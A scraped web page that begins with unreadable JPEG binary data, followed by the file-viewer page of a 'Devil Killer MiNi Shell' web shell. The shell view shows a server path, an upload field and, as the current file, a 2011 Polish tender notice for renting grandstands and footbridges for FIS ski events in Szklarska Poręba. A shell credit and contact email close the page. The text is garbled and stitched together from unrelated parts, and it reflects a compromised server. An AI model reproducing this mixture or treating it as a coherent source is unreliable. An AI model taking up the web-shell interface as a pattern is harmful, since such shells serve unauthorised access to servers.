JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111205/318325-N-2011.html

<p class="kh_header"><b>Szklarska Poręba: Wynajem trybun i mostków dla pieszych  na potrzeby organizacji 
zawodów Pucharu Świata FIS oraz World Uphill Trophy w narciarstwie biegowym 
Szklarska Poręba -  Jakuszyce 2012</b><br>
<b>Numer ogłoszenia: 318325 - 2011; data zamieszczenia: 05.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Szklarska Poręba , ul. M. Buczka 2, 58-580 Szklarska Poręba, woj. dolnośląskie, tel. 075 7547712, faks 075 7547724.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wynajem trybun i mostków dla pieszych  na potrzeby organizacji 
zawodów Pucharu Świata FIS oraz World Uphill Trophy w narciarstwie biegowym 
Szklarska Poręba -  Jakuszyce 2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest  zakup usług pozostałych - wynajem trybun i mostków dla pieszych na potrzeby organizacji zawodów Pucharu Świata FIS  oraz World Uphill Trophy w narciarstwie biegowym Szklarska Poręba -  Jakuszyce 2012 

Zakres przedmiotu zamówienia obejmuje :

A. WYNAJEM DWÓCH (2)  TRYBUN,  z łączną ilością miejsc -  minimalną  3 900   i maksymalną  4300 ,  przy czym ze względu na konfigurację terenu i warunki gruntowe 
    a) trybuna Nr 1  z ilością miejsc stojących   od 2100  do 2300  może być zlokalizowana na powierzchni 
      dwóch prostokątów połączonych ze sobą w kształcie litery L , odpowiednio o wymiarach : 12*27 [m]  
      4,8*55 [m],
   
    b) trybuna Nr 2  z ilością miejsc stojących   od 1800  do 2000  może być zlokalizowana na powierzchni 
      prostokąta o wymiarach  9*62 [m].  

Trybuny musza spełniać wymagania - warunki  określone przez Zamawiającego:

a)	konstrukcja posadowiona na gruncie,
b)	trybuna wykonana z elementów modułowych, stalowych, ocynkowanych, 
Moduły nie powinny przekraczać wymiarów: głębokość 160cm, szerokość 260cm i powinny  być podzielone na 3  stopnie o różnicy poziomu 16,5 cm.
c)	podłoga powinna być  wykonana z pomostów stalowych perforowanych. 
     Nie dopuszcza się stosowania krat pomostowych.
d)	barierki stalowe, ocynkowane powinny być szczeblowane , o max. rozstawie szczebli nie większym niż 20cm. Minimalna wysokość barierki  110cm.
e)	 wymagane jest  wykonanie barier dzielących ludzi na trybunie,  minimum co 9 rzędów,
f)	trybuny powinny mieć minimalną obciążalność 5kN/m2,
g)	barierki powinny przenosić obciążenia  minimum 100kg/ mb,
h)	 trybuny powinny posiadać oznakowanie znakiem  bezpieczeństwa B,
i)	 trybuny powinny spełniać wymagania określone normą PN-EN 13200-1:2005 Obiekty widowiskowe ,          w tym szczególnie  normy  PN-EN 13200-6:2007 Trybuny demontowalne ( tymczasowe). 

Zamawiający ,na załączonych rysunkach oznaczonych [1.1 ]do [2.3] ,  przedstawił najbardziej optymalne rozwiązanie  trybun , przy czym wykonawca może zaproponować inne ich rozwiązanie pod warunkiem  zachowania wymagań oraz dopuszczonych odchyłek (tolerancji) wymiarów, o których mowa w punkcie 2.A. 
Wprowadzenie takich zmian będzie traktowane przez Zamawiającego  jako rozwiązanie równoważne .
W przypadku zastosowania innego tzn. równoważnego rozwiązania - wykonawca jest zobowiązany do oferty dołączyć rysunek techniczny ( minimum rzut i wizualizacja) z opisem technicznym.


B. WYNAJEM TRZECH (3)  MOSTKOW DLA PIESZYCH , w tym:

  a) mostek  Nr 1  -  sztuk 2 :  szerokość minimum 4m w świetle wewnętrznej krawędzi barierki 
                                               długość  minimum 14 m, ze względu na szerokość drogi (trasy dla zawodników)
                                               prześwit pomiędzy trasą o najniżej wysunięta częścią konstrukcji mostu  
                                                 - w przedziale  3,4 m do 3,6 m ( zachowanie przejezdności sprzętu technicznego)
                                               kształt jak na rysunku z uwagi na ograniczoną dostępność terenu.

  b) mostek  Nr 2 -  sztuk 1 :  szerokość minimum 2m w świetle wewnętrznej krawędzi barierki 
                                               długość  minimum 10,0 m
                                               prześwit pomiędzy trasą o najniżej wysunięta częścią konstrukcji mostu  
                                                 - w przedziale  3,4 m do 3,6 m
                                               kształt jak na rysunku z uwagi na ograniczoną dostępność terenu.

Mostki dla pieszych muszą spełniać wymagania - warunki  określone przez Zamawiającego:

a)	Konstrukcja posadowiona na gruncie,
b)	konstrukcje wykonana z elementów modułowych, stalowych, ocynkowanych,
c)	_podłoga_ powinna być wykonana z pomostów stalowych perforowanych, 
      Nie dopuszcza się stosowania krat pomostowych.
d)	barierki stalowe, ocynkowane powinny być szczeblowane , o maksymalnym  rozstawie szczebli nie większym niż 20cm. Minimalna wysokość barierki  110cm.
e)	barierki powinny przenosić obciążenia  min. 100kg /mb,
f)	konstrukcje mostków powinny mieć minimalną obciążalność 5kN/m2,
g)	konstrukcje mostków powinny posiadać oznakowanie znakiem bezpieczeństwa B,
h)	mostki dla pieszych powinny spełniać wymagania Rozporządzenia Ministra Transportu i Gospodarki Morskiej z 30.05.2000r. w sprawie warunków technicznych, jakim powinny odpowiadać drogowe obiekty inżynierskie i ich usytuowanie (Dz.U. 2000.63.735, z zm.) 
Zamawiający ,na załączonych rysunkach oznaczonych [3.1] do [4.3] ,  przedstawił rozwiązanie mostków, najbardziej optymalne ze względu na dostępność i konfigurację terenu , przy czym wykonawca może zaproponować inne ich rozwiązanie pod warunkiem  zachowania wymagań oraz dopuszczonych odchyłek (tolerancji) wymiarów , o których mowa w punkcie 2.B. 
Wprowadzenie takich zmian będzie traktowane przez Zamawiającego  jako rozwiązanie równoważne .
W przypadku zastosowania innego, tzn. równoważnego rozwiązania - wykonawca jest zobowiązany do oferty dołączyć rysunek techniczny ( minimum rzut i wizualizacja) wraz  z opisem technicznym.

WYMAGANIA- WARUNKI  WSPÓLNE DLA   A i B :



1-	zakres przedmiot zamówienia obejmuje:
a)	przygotowanie podłoża,
b)	załadunek , transport i rozładunek przedmiotu zamówienia w miejscu jego docelowej lokalizacji,
c)	montaż,
d)	wynajem trybun i mostków dla pieszych na  czas wymagany przez Zamawiajacego , 
e)	demontaż, załadunek i wywiezienie z miejsca lokalizacji  trybun i mostków dla pieszych,
f)	uprzątnięcie terenu po zakończonym demontażu ,

2-	wymagane dokumenty do  przekazania  Zamawiającemu  przy podpisaniu protokołu przekazującego trybuny i mostki dla pieszych pod wynajem:
a)	oświadczenie kierownika montażu  i/lub kierownika budowy o wykonaniu bezpiecznego montażu   trybun i mostków dla pieszych  zgodnie z instrukcją producenta i  w sposób nie zagrażający zdrowiu      i życiu osób tam przebywających,
b)	dokumentacja techniczna ( rysunki techniczne z opisem technicznym , certyfikaty, obliczenia, etc.)
c)	operat techniczny dla zmontowanych trybun i mostków dla pieszych  podpisany przez rzeczoznawcę p. poż. i rzeczoznawcę ds. BHP..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.22.31.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 19.02.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>poparta  należytym wykonaniem w okresie ostatnich 3 lat przed upływem terminu  składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie -  realizacji minimum trzech (3) zamówień związanych z dostawą i montażem  trybun demontowalnych                ( mobilnych)  konstrukcji stalowej  ,  z ilością miejsc na trybunie  co najmniej 2000  każda trybuna.

Wykonawca zobowiązany jest przedłożyć wykaz wykonanych dostaw łącznie z montażem według wzoru stanowiącego Załącznik Nr 4, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączyć dokumenty potwierdzające, że usługi zostały wykonane należycie.

W przypadku wykazania wartości wykonanych robót  w walutach innych niż PLN -  należy podać kwotę w PLN, , przeliczając kwotę wartości wykonanych robót rozliczanych w innych walutach na  PLN wg średniego kursu danej waluty, ogłaszanego przez Narodowy Bank Polski na dzień 30.09.2011 r. 
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 

Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu niniejszego zamówienia- Załącznik Nr 7 do IDW.
W przypadku wspólnego ubiegania się wykonawców o udzielenie niniejszego zamówienia oceniana będzie ich łączna wiedza i doświadczenie -w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku.

Wykonawca lub wykonawcy ubiegający się wspólnie o udzielenie zamówienia( konsorcjum, spółka cywilna)  wraz z ofertą złoży lub złożą  oświadczenie o spełnieniu warunków udziału   w postępowaniu ( art.22 ust. 1 u.p.z.p.)    - Załącznik Nr 2 do IDW

    
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na podstawie dokumentów według formuły: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- nalezy   wskazać do uczestnictwa w wykonaniu niniejszego zamówienia
Kierownika Budowy / kierownika montażu     posiadającego :
°  co najmniej trzy (3) lata doświadczenia zawodowego na stanowisku kierownika budowy i/lub 
    kierownika montażu , 
° uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej  lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej    obowiązujących przepisów 
° ważny na dzień upływu terminu  składania ofert dokument potwierdzający przynależność  do   właściwej  Izby Inżynierów Budownictwa,
  
Przez wymagany  minimalny okres  doświadczenia zawodowego   należy rozumieć  łączną ilość   miesięcy przepracowanych  na stanowisku kierownika budowy i/lub kierownika montażu przy realizacjach związanych z  montażem nośnych konstrukcji stalowych , w tym  trybun, mostów, kładek, wiaduktów, itp.  w okresie od daty uzyskania uprawnień budowlanych do daty ukazania się ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych .

Do minimalnego okresu doświadczenia zawodowego na stanowisku kierownika budowy i/lub kierownika montażu nie sumuje się okresu zatrudnienia danej osoby na innych budowach w tym samym czasie . 
Jeżeli wskazana wyżej osoba jest  obywatelem państw członkowskich Unii Europejskiej i nabyła w tych państwach, poza granicami Rzeczypospolitej Polskiej, kwalifikacje zawodowe do wykonywania samodzielnych funkcji w budownictwie, mając na względzie obowiązujące w Polsce przepisy prawa krajowego (art. 12 pkt 7 w zw. z art. 12 a Prawa budowlanego), wymagane będzie od tej osoby uznanie jej kwalifikacji zawodowych oraz wstąpienie do właściwej polskiej izby samorządu zawodowego. Postępowanie w sprawie uznania kwalifikacji zawodowych odbywa się na podstawie ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63, poz. 394).

Dysponowanie osobami  wymienionymi  powyżej  nie wyczerpuje  całości personelu, jakim wykonawca winien dysponować do  rzetelnego wypełnienia zobowiązań wynikajacych z realizacji zamówienia. 

Na potwierdzenie spełniania powyższych warunków Wykonawcy są zobowiązani przedstawić:

a)	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności osoby  odpowiedzialnej za kierowanie robotami montażowymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia , a także zakresu wykonywanych przez te osoby czynności wraz z  informacją o podstawie dysponowania tymi osobami - Załącznik Nr 5 do IDW  

b)	Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia wydane zgodnie z przepisami ustawy z 07.07.1994 r. Prawa budowlanego - Załącznik Nr 6 do IDW.
Wykonawca może polegać na osobach zdolnych do wykonania niniejszego zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 

Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu niniejszego zamówienia- Załącznik Nr 7 do IDW.    W przypadku wspólnego ubiegania się wykonawców o udzielenie niniejszego zamówienia oceniany będzie ich  łączny  kadrowy - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku.

4. Wykonawca lub wykonawcy ubiegający się wspólnie o udzielenie zamówienia( konsorcjum, spółka cywilna)  wraz z ofertą złoży lub złożą  oświadczenie o spełnieniu warunków udziału   w postępowaniu ( art.22 ust. 1 u.p.z.p.)    - Załącznik Nr 2 do IDW

    
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na podstawie dokumentów według formuły: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>poparta posiadaniem : 

a)  środków finansowych  lub zdolności kredytowej lub środków finansowych i zdolności kredytowej 
- w wysokości co najmniej   300 000 PLN  -  w oparciu o złożone oświadczenie 

b)	opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego ubezpieczenie od odpowiedzialności cywilnej  w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia w wysokości  stanowiącej co najmniej  równowartość ceny ofertowej za wykonanie przedmiotu zamówienia. 
W przypadku wykazania sumy ubezpieczenia wykazanej w walucie obcej, Zamawiający przyjmie, iż sumą ubezpieczenia jest iloczyn wykazanej sumy ubezpieczenia i średniego kursu tej waluty, określonego przez Narodowy Bank Polski  na dzień 30 września 2011 r. 

Do przedłożenia polisy lub innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od
odpowiedzialności cywilnej  zostanie wezwany wykonawca , którego oferta uznana zostanie za najkorzystniejszą   -  przed podpisaniem umowy. Wykonawca może polegać zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 

Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu niniejszego zamówienia- Załącznik Nr 7 do IDW,   przy czym   od takiego podmiotu udostepniajacego wymagane jest złożenie oświadczenia jak od wykonawcy. 

W przypadku wspólnego ubiegania się wykonawców o udzielenie niniejszego zamówienia oceniana będzie łączna sytuacja ekonomiczna      i finansowa - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku.

Wykonawca lub wykonawcy ubiegający się wspólnie o udzielenie zamówienia( konsorcjum, spółka cywilna)  wraz z ofertą złoży lub złożą  oświadczenie o spełnieniu warunków udziału   w postępowaniu ( art.22 ust. 1 u.p.z.p.)    - Załącznik Nr 2 do IDW

    
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na podstawie dokumentów według formuły: spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający  przewiduje możliwości zmiany zawartej  umowy :  

a)	w przypadku  klęski żywiołowej  lub nagłych, nieprzewidywalnych i negatywnych zmian warunków   atmosferycznych powodujących odwołanie zawodów Pucharu Świata FIS oraz World Uphill Trophy          w narciarstwie biegowym ,

b)	konieczności zmiany osoby  nadzorującej realizację przedmiotu zamówienia - kierownika budowy/   kierownika montażu,

c)	zmiany części zamówienia realizowanej z udziałem podwykonawcy(ów),

d) zmiany podwykonawcy lub konieczności wprowadzenia dodatkowo podwykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.szklarskaporeba.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ze strony internetowej Zamawiającego lub w formie pisemnej w ciągu 5 dni od daty złożenia wniosku i wniesienia opłaty w kwocie 20 zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.12.2011 godzina 09:45, miejsce: Urząd Miasta Szklarska Poręba , ul . M. Buczka 2 , 58-580 Szklarska Poręba  lub bezpośrednio (z wyjątkiem soboty)  w godz. 08:00 ÷ 15:15 ,  w Biurze Obsługi Interesantów - parter (adres j.w.).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> współfinansowanie imprezy z budżetu Województwa Dolnośląskiego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com